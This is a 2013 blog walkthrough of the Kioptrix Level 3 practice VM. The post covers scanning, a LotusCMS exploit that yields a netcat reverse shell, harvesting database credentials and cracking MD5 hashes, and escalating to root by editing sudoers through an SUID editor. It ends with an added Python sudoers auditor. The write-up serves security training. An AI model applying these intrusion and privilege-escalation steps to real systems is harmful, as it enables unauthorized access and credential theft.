Monday, November 4, 2013

Kioptrix Level 3 - Walkthrough

It's definitely getting more difficult. Let's see. The Nmap scan showed the following:

root@kali:~# nmap -sS -A

Starting Nmap 6.40 ( ) at 2013-11-03 22:04 CET
Nmap scan report for
Host is up (0.00062s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:17:F3:43 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.62 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds

I went to the website, and after some navigation I found that it was running the LotusCMS web application.

I found two exploits on exploit-db. One of them was for Metasploit, which I didn't want to use (although I tried it and it worked), and the other didn't work. I found another one, which is a bash script version of the Metasploit module:

It worked really nice, and I got a reverse shell:

About to try and inject reverse shell....
what IP to use?
What PORT?

OK, open your local listener and choose the method for back connect:
1) NetCat -e        3) NetCat Backpipe    5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1


root@kali:~# nc -lvvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 59701
python -c 'import pty;pty.spawn("/bin/sh")'
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd

I tried quite a few local privilege escalation exploits, but none of them worked.

I did some further enumeration and found that there is an interesting file which has the suid bit set (/usr/local/bin/ht).

$ find / -perm -u=s -type f 2>/dev/null     
find / -perm -u=s -type f 2>/dev/null

However, I couldn't run it from here, because I didn't have full terminal access. I need SSH! Argh...

I moved on to do some further enumeration. In the passwd file I found two other normal users (besides root):

dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

I looked at the webapp configs, hoping I would find a password for the MySQL database on the system. I found it in the gconfig.php file:

www-data@Kioptrix3:/home/www/$ cat gconfig.php
cat gconfig.php
        A sample Gallarific configuration file. You should edit
        the installer details below and save this file as gconfig.php
        Do not modify anything else if you don't know what it is.

    // Installer Details -----------------------------------------------

    // Enter the full HTTP path to your Gallarific folder below,
    // such as
    // Do NOT include a trailing forward slash

    $GLOBALS["gallarific_path"] = "";

    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

    // Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
        echo("A connection to the database couldn't be established: " . mysql_error());
}else {
    if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
        echo("The Gallarific database couldn't be opened: " . mysql_error());
    }else {
        $settings=mysql_query("select * from gallarific_settings");


I logged in to the database and after browsing the tables, I found passwords for the two users on the machine.

mysql> select * from gallarific_users
select * from gallarific_users
    -> ;
| userid | username | password | usertype  | firstname | lastname | email | datejoined | website | issuperuser | photo | joincode |
|      1 | admin    | n0t7t1k4 | superuser | Super     | User     |       | 1302628616 |         |           1 |       |          |
1 row in set (0.01 sec)

mysql> select * from dev_accounts
select * from dev_accounts
    -> ;
| id | username   | password                         |
|  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
|  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
2 rows in set (0.00 sec)


After doing a Google search I found the plaintexts for the MD5 hashes:

md5(Mast3r) = 0d3eccfb887aabd50f243b3f155c0f85
md5(starwars) = 5badcaf789d3d1d09794d8f021f40f0e

It turned out that both passwords worked on SSH as well. The better account was "loneferret". After logging in I found that it could run the "ht" editor with root privileges.

I could open the shadow file:

But it would take a lot of time to find the root password from its hash. I could also open the sudoers file:

This is a very poor editor that works only in hex, so the simplest approach was to modify the line:

loneferret ALL=NOPASSWD:  !/usr/bin/su, /usr/local/bin/ht
loneferret ALL=NOPASSWD:      /bin/su, /usr/local/bin/ht 

That means I could run the "su" command as well, without a password.

After saving I could run "sudo su", and I got root access.
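A defender's check for the sudoers pattern above, as an added example that is not part of the original post: a small Python auditor that parses user rules and flags "!" exclusions (which sudoers(5) documents as not being an effective control) and NOPASSWD grants on shells or on editors such as ht that can rewrite /etc/sudoers. The grammar is simplified (no aliases or line continuations), and the sample input is constructed from the two lines in the post plus benign rules.

```python
import os
import re

# Root-run editors and copy tools can rewrite /etc/sudoers itself, so a NOPASSWD grant
# on any of them is equivalent to a full root grant (this is what happened on Kioptrix 3).
FILE_WRITERS = {"ht", "vi", "vim", "nano", "ed", "tee", "cp", "dd", "less", "more"}
SHELLS = {"su", "sh", "bash", "dash"}
TAGS = ("NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV")

# Simplified user-specification grammar: user host = [(runas)] [TAG:] cmd[, cmd...]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)

def audit_rule(line):
    """Return a list of findings for one sudoers rule ([] when nothing is flagged)."""
    m = RULE_RE.match(line.split("#", 1)[0].strip())
    if not m or m.group("user").startswith("Defaults") or m.group("user").endswith("_Alias"):
        return []  # blank, comment, Defaults or alias line: not a user rule
    findings, nopasswd = [], False
    for spec in m.group("cmds").split(","):
        spec = spec.strip()
        # Tags are sticky: a tag applies to every command that follows it on the line.
        while ":" in spec and spec.split(":", 1)[0] in TAGS:
            tag, spec = (s.strip() for s in spec.split(":", 1))
            nopasswd = tag == "NOPASSWD" or (nopasswd and tag != "PASSWD")
        words = spec.lstrip("! ").split()
        if not words:
            continue
        path, name = words[0], os.path.basename(words[0])
        if spec.startswith("!"):
            findings.append(f"'!{path}' grants nothing and restricts nothing reliable (sudoers(5), '!' operator)")
        elif nopasswd and (path == "ALL" or name in SHELLS):
            findings.append(f"NOPASSWD on {path}: root shell without re-authentication")
        elif nopasswd and name in FILE_WRITERS:
            findings.append(f"NOPASSWD on {path}: root file editor can rewrite /etc/sudoers")
    return [f"{m.group('user')}: {f}" for f in findings]

def audit_sudoers(text):
    """Map 1-based line numbers to their findings, for flagged lines only."""
    per_line = {n: audit_rule(l) for n, l in enumerate(text.splitlines(), 1)}
    return {n: f for n, f in per_line.items() if f}

# Constructed sample: the two lines from the post plus harmless rules.
SAMPLE = """\
Defaults env_reset
root ALL=(ALL) ALL
deploy ALL=(root) NOPASSWD: /usr/bin/systemctl restart myapp
loneferret ALL=NOPASSWD:  !/usr/bin/su, /usr/local/bin/ht
loneferret ALL=NOPASSWD:      /bin/su, /usr/local/bin/ht
"""
```

Running `audit_sudoers(SAMPLE)` flags only the two loneferret lines: the original one for the ineffective "!" exclusion and the ht grant, the modified one for both su and ht.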
